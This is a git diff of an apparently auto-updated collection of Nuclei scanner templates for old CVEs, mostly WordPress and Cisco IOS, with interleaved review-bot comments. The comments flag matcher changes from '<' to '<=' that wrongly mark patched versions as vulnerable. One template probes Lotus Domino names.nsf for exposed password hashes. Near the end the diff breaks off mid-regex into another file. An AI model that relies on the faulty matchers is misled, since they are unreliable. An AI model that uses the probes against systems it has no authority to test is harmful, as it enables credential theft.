"2024-09-14 02:20:23", + "next-gen_application_firewall.yaml": "2024-09-14 02:20:23", + "hybris.yaml": "2024-09-14 02:20:23", + "calibre.yaml": "2024-09-14 02:20:23", + "azure-apim-system-assigned-identity-unconfigured.yaml": "2024-09-14 02:20:23", + "tinyfilemanager.yaml": "2024-09-14 02:20:23", + "azure-sql-delete-db-unalerted.yaml": "2024-09-14 02:20:23", + "azure-functionapp-user-assigned-id-missing.yaml": "2024-09-14 02:20:23", + 
"azure-vm-jit-access-not-enabled.yaml": "2024-09-14 02:20:23", + "azure-vm-boot-diagnostics-not-enabled.yaml": "2024-09-14 02:20:23", + "azure-network-watcher.yaml": "2024-09-14 02:20:23", + "azure-aks-entra-id-unintegrated.yaml": "2024-09-14 02:20:23", + "zentao.yaml": "2024-09-14 02:20:23", + "azure-appservice-ftp-deployment-disabled.yaml": "2024-09-14 02:20:23", + "CVE-2023-38992.yaml": "2024-09-14 02:20:23" } \ No newline at end of file diff --git a/links.csv b/links.csv index 34665a1981..5e1184f3e3 100644 --- a/links.csv +++ b/links.csv @@ -462,3 +462,4 @@ https://github.com/MuhammadWaseem29/Nuclei-templates-w https://github.com/Kennyslaboratory/Nuclei-Templates https://github.com/MuhammadWaseem29/Nuclei-templates-waseem https://github.com/machevalia/Custom-Nuclei-Templates +https://github.com/dat-ayush/custom-nuclei-templates diff --git a/nuclei-templates/CVE-2000/cve-2000-0114.yaml b/nuclei-templates/CVE-2000/CVE-2000-0114.yaml similarity index 100% rename from nuclei-templates/CVE-2000/cve-2000-0114.yaml rename to nuclei-templates/CVE-2000/CVE-2000-0114.yaml diff --git a/nuclei-templates/CVE-2001/CVE-2001-0537.yaml b/nuclei-templates/CVE-2001/CVE-2001-0537.yaml index 47e397a19a..57d6042605 100644 --- a/nuclei-templates/CVE-2001/CVE-2001-0537.yaml +++ b/nuclei-templates/CVE-2001/CVE-2001-0537.yaml 
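Review bot: The new source `https://github.com/dat-ayush/custom-nuclei-templates` is appended as a bare repository URL with no commit pin, and the commit subject (`Auto Updated`) suggests this list feeds an unattended fetch-and-commit job, so whatever that repository publishes from now on appears to land in `nuclei-templates/` without anyone reading it. Templates are executable scanner logic: an unvetted upstream can steer where the aggregated set sends requests or what it reports as a finding. Consider recording a reviewed commit hash alongside the URL (for example `https://github.com/dat-ayush/custom-nuclei-templates,<sha>`, if the consumer of this CSV can be taught a second column) or gating new sources behind a manual review step before the auto-updater picks them up.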
@@ -6,25 +6,30 @@ info: severity: critical description: | HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the affected device. + remediation: | + Apply the appropriate patch or upgrade to a fixed version of the Cisco IOS software. reference: - https://www.rapid7.com/db/modules/auxiliary/scanner/http/cisco_ios_auth_bypass/ - https://nvd.nist.gov/vuln/detail/CVE-2001-0537 - http://www.ciac.org/ciac/bulletins/l-106.shtml - https://exchange.xforce.ibmcloud.com/vulnerabilities/6749 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C cvss-score: 9.3 cve-id: CVE-2001-0537 cwe-id: CWE-287 - epss-score: 0.88063 + epss-score: 0.87683 + epss-percentile: 0.98569 cpe: cpe:2.3:o:cisco:ios:11.3:*:*:*:*:*:*:* - epss-percentile: 0.9824 metadata: - max-request: 1 verified: true - shodan-query: product:"Cisco IOS http config" && 200 + max-request: 1 vendor: cisco product: ios + shodan-query: product:"Cisco IOS http config" && 200 tags: cve,cve2001,cisco,ios,auth-bypass http: @@ -45,3 +50,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502201530427f983f1ac47d92a3e00fb141fab33efd4f9ac109b29beca3488669ca5b022100e7ab1cc3fec5da235092a57848d0f83403d81bff12d5ed347ee7d6442b19444c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2001/CVE-2001-1473.yaml b/nuclei-templates/CVE-2001/cve-2001-1473.yaml similarity index 100% rename from nuclei-templates/CVE-2001/CVE-2001-1473.yaml rename to nuclei-templates/CVE-2001/cve-2001-1473.yaml diff --git a/nuclei-templates/CVE-2003/CVE-2003-1598.yaml b/nuclei-templates/CVE-2003/CVE-2003-1598.yaml index cadba79fcb..5e50e3a2b4 100644 --- a/nuclei-templates/CVE-2003/CVE-2003-1598.yaml 
+++ b/nuclei-templates/CVE-2003/CVE-2003-1598.yaml @@ -1,18 +1,14 @@ id: CVE-2003-1598 info: - name: "WordPress Core < 0.72 - SQL Injection" + name: > + WordPress Core < 0.72 - SQL Injection author: topscoder severity: high - description: "SQL injection vulnerability in log.header.php in WordPress 0.7 and earlier allows remote attackers to execute arbitrary SQL commands via the posts variable." + description: > + SQL injection vulnerability in log.header.php in WordPress 0.7 and earlier allows remote attackers to execute arbitrary SQL commands via the posts variable. reference: - - http://www.kernelpanik.org/docs/kernelpanik/wordpressadv.txt - - http://seclists.org/oss-sec/2012/q1/77 - - http://secunia.com/advisories/8954/ - - http://osvdb.org/show/osvdb/4610 - - http://www.securityfocus.com/bid/7784 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/12204 - - https://wordpress.org/news/2003/10/072-final-version-available/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0534bc03-5d7d-47fe-9c07-c9a61af38df2?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 @@ -36,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '< 0.72') - - compare_versions(version_by_js, '< 0.72') - - compare_versions(version_by_css, '< 0.72') + - compare_versions(version_by_generator, '<= 0.72') + - compare_versions(version_by_js, '<= 0.72') + - compare_versions(version_by_css, '<= 0.72') - type: status status: diff --git a/nuclei-templates/CVE-2003/CVE-2003-1599.yaml b/nuclei-templates/CVE-2003/CVE-2003-1599.yaml index 6c808c2278..c549c9eb77 100644 --- a/nuclei-templates/CVE-2003/CVE-2003-1599.yaml +++ b/nuclei-templates/CVE-2003/CVE-2003-1599.yaml 
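Review bot: The matcher change from `< 0.72` to `<= 0.72` in the second hunk now flags WordPress 0.72 as vulnerable, while the template's own name reads `WordPress Core < 0.72`, the description says "0.7 and earlier", and the dropped `072-final-version-available` reference is the release that shipped the fix. Every patched 0.72 site becomes a false positive, which also undercuts the `severity: high` triage this template drives. Keep the three original bounds, `compare_versions(version_by_generator, '< 0.72')` and the `version_by_js` / `version_by_css` variants. The surrounding `http:` section begins before this hunk.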
@@ -1,17 +1,14 @@ id: CVE-2003-1599 info: - name: "WordPress Core <= 0.70 - Remote File Inclusion" + name: > + WordPress Core <= 0.70 - Remote File Inclusion author: topscoder severity: critical - description: "PHP remote file inclusion vulnerability in wp-links/links.all.php in WordPress 0.70 allows remote attackers to execute arbitrary PHP code via a URL in the $abspath variable." + description: > + PHP remote file inclusion vulnerability in wp-links/links.all.php in WordPress 0.70 allows remote attackers to execute arbitrary PHP code via a URL in the $abspath variable. reference: - - https://exchange.xforce.ibmcloud.com/vulnerabilities/12205 - - http://www.kernelpanik.org/docs/kernelpanik/wordpressadv.txt - - http://www.openwall.com/lists/oss-security/2012/01/06/3 - - http://www.securityfocus.com/bid/7785 - - http://www.osvdb.org/4611 - - https://wordpress.org/news/2003/06/wordpress-071-now-available/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/da760bcf-b252-4b88-9f54-af0a097e3295?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 diff --git a/nuclei-templates/CVE-2004/CVE-2004-1559.yaml b/nuclei-templates/CVE-2004/CVE-2004-1559.yaml index d0f9d76e3c..5a00de0ca2 100644 --- a/nuclei-templates/CVE-2004/CVE-2004-1559.yaml +++ b/nuclei-templates/CVE-2004/CVE-2004-1559.yaml 
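Review bot: The `reference:` list is reduced to a single Wordfence URL that carries a `?source=api-prod` tracking query string, and the vendor release note (`wordpress-071-now-available`) plus the oss-security thread are gone, so a triager verifying a hit no longer has a primary source to check the affected range against. Keep at least the wordpress.org release note next to the Wordfence entry, and strip the `?source=api-prod` suffix since it adds nothing to the citation. The same consolidation appears in the sibling WordPress templates in this patch; the fix is the same for each.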
@@ -1,18 +1,14 @@ id: CVE-2004-1559 info: - name: "WordPress Core < 1.2.1 - Cross-Site Scripting" + name: > + WordPress Core < 1.2.1 - Cross-Site Scripting author: topscoder severity: medium - description: "Multiple cross-site scripting (XSS) vulnerabilities in Wordpress 1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) redirect_to, text, popupurl, or popuptitle parameters to wp-login.php, (2) redirect_url parameter to admin-header.php, (3) popuptitle, popupurl, content, or post_title parameters to bookmarklet.php, (4) cat_ID parameter to categories.php, (5) s parameter to edit.php, or (6) s or mode parameter to edit-comments.php." + description: > + Multiple cross-site scripting (XSS) vulnerabilities in Wordpress 1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) redirect_to, text, popupurl, or popuptitle parameters to wp-login.php, (2) redirect_url parameter to admin-header.php, (3) popuptitle, popupurl, content, or post_title parameters to bookmarklet.php, (4) cat_ID parameter to categories.php, (5) s parameter to edit.php, or (6) s or mode parameter to edit-comments.php. reference: - - https://exchange.xforce.ibmcloud.com/vulnerabilities/17532 - - http://secunia.com/advisories/12683 - - http://marc.info/?l=bugtraq&m=109641484723194&w=2 - - http://www.securityfocus.com/bid/11268 - - http://securitytracker.com/id?1011440 - - https://wordpress.org/news/2005/02/strayhorn/ - - https://wordpress.org/news/2004/10/wp-121/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e8687bf7-4172-4cc3-bd6e-830fc5fc28e9?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 
@@ -36,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '< 1.2') - - compare_versions(version_by_js, '< 1.2') - - compare_versions(version_by_css, '< 1.2') + - compare_versions(version_by_generator, '<= 1.2') + - compare_versions(version_by_js, '<= 1.2') + - compare_versions(version_by_css, '<= 1.2') - type: status status: diff --git a/nuclei-templates/CVE-2004/CVE-2004-1584.yaml b/nuclei-templates/CVE-2004/CVE-2004-1584.yaml index c4d0c328ba..d2c4ae3c61 100644 --- a/nuclei-templates/CVE-2004/CVE-2004-1584.yaml +++ b/nuclei-templates/CVE-2004/CVE-2004-1584.yaml @@ -1,17 +1,14 @@ id: CVE-2004-1584 info: - name: "WordPress Core <= 1.2 - HTTP Response Splitting" + name: > + WordPress Core <= 1.2 - HTTP Response Splitting author: topscoder severity: medium - description: "CRLF injection vulnerability in wp-login.php in WordPress 1.2 allows remote attackers to perform HTTP Response Splitting attacks to modify expected HTML content from the server via the text parameter." + description: > + CRLF injection vulnerability in wp-login.php in WordPress 1.2 allows remote attackers to perform HTTP Response Splitting attacks to modify expected HTML content from the server via the text parameter. reference: - - http://marc.info/?l=bugtraq&m=109716327724041&w=2 - - http://www.securityfocus.com/bid/11348 - - http://secunia.com/advisories/12773 - - http://wordpress.org/development/2004/10/wp-121/ - - http://www.gentoo.org/security/en/glsa/glsa-200410-12.xml - - https://exchange.xforce.ibmcloud.com/vulnerabilities/17649 + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ec8ad817-9716-4d29-a02a-57eb9aa58a13?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-score: 5.3 
@@ -35,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '< 1.2.1') - - compare_versions(version_by_js, '< 1.2.1') - - compare_versions(version_by_css, '< 1.2.1') + - compare_versions(version_by_generator, '<= 1.2.1') + - compare_versions(version_by_js, '<= 1.2.1') + - compare_versions(version_by_css, '<= 1.2.1') - type: status status: diff --git a/nuclei-templates/CVE-2004/CVE-2004-1965.yaml b/nuclei-templates/CVE-2004/CVE-2004-1965.yaml index 749de068b3..c1f874a540 100644 --- a/nuclei-templates/CVE-2004/CVE-2004-1965.yaml +++ b/nuclei-templates/CVE-2004/CVE-2004-1965.yaml @@ -6,6 +6,10 @@ info: severity: medium description: | Multiple cross-site scripting (XSS) vulnerabilities in Open Bulletin Board (OpenBB) 1.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) redirect parameter to member.php, (2) to parameter to myhome.php (3) TID parameter to post.php, or (4) redirect parameter to index.php. + impact: | + Successful exploitation of these vulnerabilities could lead to unauthorized access, phishing attacks, and potential data theft. + remediation: | + Upgrade to a patched version of Open Bulletin Board (OpenBB) or apply necessary security patches to mitigate the vulnerabilities. reference: - https://www.exploit-db.com/exploits/24055 - https://nvd.nist.gov/vuln/detail/CVE-2004-1965 @@ -17,8 +21,8 @@ info: cve-id: CVE-2004-1965 cwe-id: NVD-CWE-Other epss-score: 0.0113 + epss-percentile: 0.84351 cpe: cpe:2.3:a:openbb:openbb:1.0.0_beta1:*:*:*:*:*:*:* - epss-percentile: 0.82864 metadata: max-request: 1 vendor: openbb @@ -35,3 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' +# digest: 4a0a0047304502200942a34b2650323617b6c0a05aed0e60c5452d3b77477cfa2760dd51678d7371022100cf0d486cba6f8042c311e7cc3134723dd8e8b86ff44b5cdb22e0adbfe3ba3776:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
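Review bot: The `<= 1.2.1` bound introduced in the last hunk of CVE-2004-1584.yaml marks WordPress 1.2.1 as vulnerable, yet the template name is `WordPress Core <= 1.2`, the description names 1.2 only, and the removed `wp-121` reference is the 1.2.1 release that fixed the CRLF injection. The original `< 1.2.1` was the consistent bound; restore `compare_versions(version_by_generator, '< 1.2.1')` and the matching `version_by_js` / `version_by_css` lines. The enclosing `http:` block starts outside the hunk.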
diff --git a/nuclei-templates/CVE-2005/CVE-2005-1102.yaml b/nuclei-templates/CVE-2005/CVE-2005-1102.yaml index 65c1e6b37b..1bd181ba9a 100644 --- a/nuclei-templates/CVE-2005/CVE-2005-1102.yaml +++ b/nuclei-templates/CVE-2005/CVE-2005-1102.yaml @@ -1,16 +1,14 @@ id: CVE-2005-1102 info: - name: "WordPress Core <= 1.5 - Stored Cross-Site Scripting" + name: > + WordPress Core <= 1.5 - Stored Cross-Site Scripting author: topscoder severity: medium - description: "Multiple cross-site scripting (XSS) vulnerabilities in template-functions-post.php in WordPress 1.5 and earlier allow remote attackers to execute arbitrary commands via the (1) content or (2) title of the post." + description: > + Multiple cross-site scripting (XSS) vulnerabilities in template-functions-post.php in WordPress 1.5 and earlier allow remote attackers to execute arbitrary commands via the (1) content or (2) title of the post. reference: - - http://marc.info/?l=bugtraq&m=111336102101571&w=2 - - http://security.gentoo.org/glsa/glsa-200506-04.xml - - http://bugs.gentoo.org/show_bug.cgi?id=88926 - - http://wordpress.org/support/topic.php?id=30721 - - https://wordpress.org/news/2005/05/security-update/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1d2f973a-1fb3-4c75-8c33-6d1fadf9c906?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N cvss-score: 6.4 diff --git a/nuclei-templates/CVE-2005/CVE-2005-1687.yaml b/nuclei-templates/CVE-2005/CVE-2005-1687.yaml index 14dbad9fee..95c35b2e26 100644 --- a/nuclei-templates/CVE-2005/CVE-2005-1687.yaml +++ b/nuclei-templates/CVE-2005/CVE-2005-1687.yaml 
@@ -1,15 +1,14 @@ id: CVE-2005-1687 info: - name: "WordPress Core < 1.5.1 - SQL Injection" + name: > + WordPress Core < 1.5.1 - SQL Injection author: topscoder severity: high - description: "SQL injection vulnerability in wp-trackback.php in Wordpress 1.5 and earlier allows remote attackers to execute arbitrary SQL commands via the tb_id parameter." + description: > + SQL injection vulnerability in wp-trackback.php in Wordpress 1.5 and earlier allows remote attackers to execute arbitrary SQL commands via the tb_id parameter. reference: - - http://security.gentoo.org/glsa/glsa-200506-04.xml - - http://marc.info/?l=bugtraq&m=111661517716733&w=2 - - http://bugs.gentoo.org/show_bug.cgi?id=88926 - - https://wordpress.org/news/2005/05/one-five-one/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/faf3fb76-847f-447f-b6c6-49bd0d30d3c7?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 @@ -33,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '< 1.5.1') - - compare_versions(version_by_js, '< 1.5.1') - - compare_versions(version_by_css, '< 1.5.1') + - compare_versions(version_by_generator, '<= 1.5.1') + - compare_versions(version_by_js, '<= 1.5.1') + - compare_versions(version_by_css, '<= 1.5.1') - type: status status: diff --git a/nuclei-templates/CVE-2005/CVE-2005-1688.yaml b/nuclei-templates/CVE-2005/CVE-2005-1688.yaml index 3eed11f12f..098ede37ee 100644 --- a/nuclei-templates/CVE-2005/CVE-2005-1688.yaml +++ b/nuclei-templates/CVE-2005/CVE-2005-1688.yaml 
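Review bot: The second hunk widens the DSL bound to `<= 1.5.1`, so the fixed release 1.5.1 is now reported as vulnerable to the `wp-trackback.php` SQL injection, contradicting the template name `WordPress Core < 1.5.1`, the description's "1.5 and earlier", and the removed `one-five-one` release reference. A `high`-severity false positive on the patched version is worse than the old behaviour, not better. Revert the three lines to `compare_versions(version_by_generator, '< 1.5.1')` (and the js/css variants). The `http:` section this matcher belongs to begins before the hunk.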
@@ -1,13 +1,14 @@ id: CVE-2005-1688 info: - name: "WordPress Core < 1.5.1 - Full Path Disclosure" + name: > + WordPress Core < 1.5.1 - Full Path Disclosure author: topscoder severity: medium - description: "Wordpress 1.5 and earlier allows remote attackers to obtain sensitive information via a direct request to files in (1) wp-content/themes/, (2) wp-includes/, or (3) wp-admin/, which reveal the path in an error message." + description: > + Wordpress 1.5 and earlier allows remote attackers to obtain sensitive information via a direct request to files in (1) wp-content/themes/, (2) wp-includes/, or (3) wp-admin/, which reveal the path in an error message. reference: - - http://marc.info/?l=bugtraq&m=111661517716733&w=2 - - https://wordpress.org/news/2005/05/one-five-one/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3d3b090a-71a3-4430-871d-f19ee1033e01?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 @@ -31,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '< 1.5.1') - - compare_versions(version_by_js, '< 1.5.1') - - compare_versions(version_by_css, '< 1.5.1') + - compare_versions(version_by_generator, '<= 1.5.1') + - compare_versions(version_by_js, '<= 1.5.1') + - compare_versions(version_by_css, '<= 1.5.1') - type: status status: diff --git a/nuclei-templates/CVE-2005/CVE-2005-1810.yaml b/nuclei-templates/CVE-2005/CVE-2005-1810.yaml index 417be3e0c9..9f84699835 100644 --- a/nuclei-templates/CVE-2005/CVE-2005-1810.yaml +++ b/nuclei-templates/CVE-2005/CVE-2005-1810.yaml 
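Review bot: The matcher now uses `<= 1.5.1` while the template is titled `WordPress Core < 1.5.1` and describes "1.5 and earlier", so the release that closed the path-disclosure issue is itself flagged. Keep the original `compare_versions(version_by_generator, '< 1.5.1')` and its `version_by_js` / `version_by_css` counterparts so the DSL agrees with the name and description. The enclosing `http:` block starts outside this hunk.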
@@ -1,19 +1,14 @@ id: CVE-2005-1810 info: - name: "WordPress Core < 1.5.1.2 - SQL Injection" + name: > + WordPress Core < 1.5.1.2 - SQL Injection author: topscoder severity: high - description: "SQL injection vulnerability in template-functions-category.php in WordPress 1.5.1 allows remote attackers to execute arbitrary SQL commands via the $cat_ID variable, as demonstrated using the cat parameter to index.php." + description: > + SQL injection vulnerability in template-functions-category.php in WordPress 1.5.1 allows remote attackers to execute arbitrary SQL commands via the $cat_ID variable, as demonstrated using the cat parameter to index.php. reference: - - http://bugs.gentoo.org/show_bug.cgi?id=94512 - - http://marc.info/?l=bugtraq&m=111817436619067&w=2 - - http://secunia.com/advisories/15517 - - http://www.osvdb.org/16905 - - http://security.gentoo.org/glsa/glsa-200506-04.xml - - http://www.securityfocus.com/bid/13809 - - http://wordpress.org/development/2005/05/security-update/ - - https://wordpress.org/news/2005/05/security-update/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/78669d4f-3c1e-49e6-af8d-56f105f99d01?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 diff --git a/nuclei-templates/CVE-2005/CVE-2005-2107.yaml b/nuclei-templates/CVE-2005/CVE-2005-2107.yaml index c94a63466c..88f14e2776 100644 --- a/nuclei-templates/CVE-2005/CVE-2005-2107.yaml +++ b/nuclei-templates/CVE-2005/CVE-2005-2107.yaml 
@@ -1,15 +1,14 @@ id: CVE-2005-2107 info: - name: "WordPress Core <= 1.5.1.2 - Cross-Site Scripting" + name: > + WordPress Core <= 1.5.1.2 - Cross-Site Scripting author: topscoder severity: high - description: "Multiple cross-site scripting (XSS) vulnerabilities in post.php in WordPress 1.5.1.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) p or (2) comment parameter." + description: > + Multiple cross-site scripting (XSS) vulnerabilities in post.php in WordPress 1.5.1.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) p or (2) comment parameter. reference: - - http://secunia.com/advisories/15831 - - http://www.gulftech.org/?node=research&article_id=00085-06282005 - - http://marc.info/?l=bugtraq&m=112006967221438&w=2 - - https://wordpress.org/news/2005/06/wordpress-1513/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/35ac717c-e299-4a56-bead-cb1d050da75c?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 diff --git a/nuclei-templates/CVE-2005/CVE-2005-2108.yaml b/nuclei-templates/CVE-2005/CVE-2005-2108.yaml index 2e5048bf07..37130eb0e8 100644 --- a/nuclei-templates/CVE-2005/CVE-2005-2108.yaml +++ b/nuclei-templates/CVE-2005/CVE-2005-2108.yaml 
@@ -1,15 +1,14 @@ id: CVE-2005-2108 info: - name: "WordPress Core < 1.5.1.3 - SQL Injection" + name: > + WordPress Core < 1.5.1.3 - SQL Injection author: topscoder severity: high - description: "SQL injection vulnerability in XMLRPC server in WordPress 1.5.1.2 and earlier allows remote attackers to execute arbitrary SQL commands via input that is not filtered in the HTTP_RAW_POST_DATA variable, which stores the data in an XML file." + description: > + SQL injection vulnerability in XMLRPC server in WordPress 1.5.1.2 and earlier allows remote attackers to execute arbitrary SQL commands via input that is not filtered in the HTTP_RAW_POST_DATA variable, which stores the data in an XML file. reference: - - http://secunia.com/advisories/15831 - - http://www.gulftech.org/?node=research&article_id=00085-06282005 - - http://marc.info/?l=bugtraq&m=112006967221438&w=2 - - https://wordpress.org/news/2005/06/wordpress-1513/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/11d53df8-f7b3-467c-8b3a-515974f1ea69?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 @@ -33,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '< 1.5.1.3') - - compare_versions(version_by_js, '< 1.5.1.3') - - compare_versions(version_by_css, '< 1.5.1.3') + - compare_versions(version_by_generator, '<= 1.5.1.3') + - compare_versions(version_by_js, '<= 1.5.1.3') + - compare_versions(version_by_css, '<= 1.5.1.3') - type: status status: diff --git a/nuclei-templates/CVE-2005/CVE-2005-2109.yaml b/nuclei-templates/CVE-2005/CVE-2005-2109.yaml index 3fa2876be2..0f91e16370 100644 --- a/nuclei-templates/CVE-2005/CVE-2005-2109.yaml +++ b/nuclei-templates/CVE-2005/CVE-2005-2109.yaml 
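Review bot: The second hunk changes the version bound to `<= 1.5.1.3`, which marks WordPress 1.5.1.3 as exposed to the XML-RPC SQL injection even though the name is `WordPress Core < 1.5.1.3`, the description says "1.5.1.2 and earlier", and the dropped `wordpress-1513` reference is the fixing release. Restore `compare_versions(version_by_generator, '< 1.5.1.3')` and the matching js/css lines; if the intent was to catch 1.5.1.2 itself, the strict `<` already does that. The `http:` section continues outside the hunk.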
@@ -1,15 +1,14 @@ id: CVE-2005-2109 info: - name: "WordPress Core < 1.5.1.3 - Arbitrary Email Content Change" + name: > + WordPress Core < 1.5.1.3 - Arbitrary Email Content Change author: topscoder severity: medium - description: "wp-login.php in WordPress 1.5.1.2 and earlier allows remote attackers to change the content of the forgotten password e-mail message via the message variable, which is not initialized before use." + description: > + wp-login.php in WordPress 1.5.1.2 and earlier allows remote attackers to change the content of the forgotten password e-mail message via the message variable, which is not initialized before use. reference: - - http://secunia.com/advisories/15831 - - http://www.gulftech.org/?node=research&article_id=00085-06282005 - - http://marc.info/?l=bugtraq&m=112006967221438&w=2 - - https://wordpress.org/news/2005/06/wordpress-1513/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f25d0409-dbca-4c5a-9f43-fc03e5307d0f?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-score: 5.3 diff --git a/nuclei-templates/CVE-2005/CVE-2005-2110.yaml b/nuclei-templates/CVE-2005/CVE-2005-2110.yaml index 0589e60672..91c2c854e7 100644 --- a/nuclei-templates/CVE-2005/CVE-2005-2110.yaml +++ b/nuclei-templates/CVE-2005/CVE-2005-2110.yaml 
@@ -1,17 +1,14 @@ id: CVE-2005-2110 info: - name: "WordPress Core < 1.5.1.3 - Sensitive Information Disclosure" + name: > + WordPress Core < 1.5.1.3 - Sensitive Information Disclosure author: topscoder severity: high - description: "WordPress 1.5.1.2 and earlier allows remote attackers to obtain sensitive information via (1) a direct request to menu-header.php or a '1' value in the feed parameter to (2) wp-atom.php, (3) wp-rss.php, or (4) wp-rss2.php, which reveal the path in an error message. NOTE: vector [1] was later reported to also affect WordPress 2.0.1." + description: > + WordPress 1.5.1.2 and earlier allows remote attackers to obtain sensitive information via (1) a direct request to menu-header.php or a "1" value in the feed parameter to (2) wp-atom.php, (3) wp-rss.php, or (4) wp-rss2.php, which reveal the path in an error message. NOTE: vector [1] was later reported to also affect WordPress 2.0.1. reference: - - http://NeoSecurityTeam.net/advisories/Advisory-17.txt - - http://www.securityfocus.com/archive/1/426304/100/0/threaded - - http://secunia.com/advisories/15831 - - http://www.gulftech.org/?node=research&article_id=00085-06282005 - - http://marc.info/?l=bugtraq&m=112006967221438&w=2 - - https://wordpress.org/news/2005/06/wordpress-1513/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bf48087a-f729-488a-8e40-f4e010ccd5a7?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L cvss-score: 7.3 diff --git a/nuclei-templates/CVE-2005/CVE-2005-2428.yaml b/nuclei-templates/CVE-2005/CVE-2005-2428.yaml new file mode 100644 index 0000000000..c74c52c360 --- /dev/null +++ b/nuclei-templates/CVE-2005/CVE-2005-2428.yaml 
@@ -0,0 +1,33 @@ +id: CVE-2005-2428 +info: + name: Lotus Domino R5 and R6 WebMail Default Configuration Information Disclosure + author: CasperGN + severity: medium + tags: cve,cve2005,domino + description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696). + remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files. + reference: + - http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf + - https://www.exploit-db.com/exploits/39495 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2005-2428 + cwe-id: CWE-200 + +requests: + - method: GET + path: + - "{{BaseURL}}/names.nsf/People?OpenView" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + name: domino-username + regex: + - '( + WordPress Core < 1.5.2 - Remote Code Execution author: topscoder severity: high - description: "Direct code injection vulnerability in WordPress 1.5.1.3 and earlier allows remote attackers to execute arbitrary PHP code via the cache_lastpostdate[server] cookie." + description: > + Direct code injection vulnerability in WordPress 1.5.1.3 and earlier allows remote attackers to execute arbitrary PHP code via the cache_lastpostdate[server] cookie. 
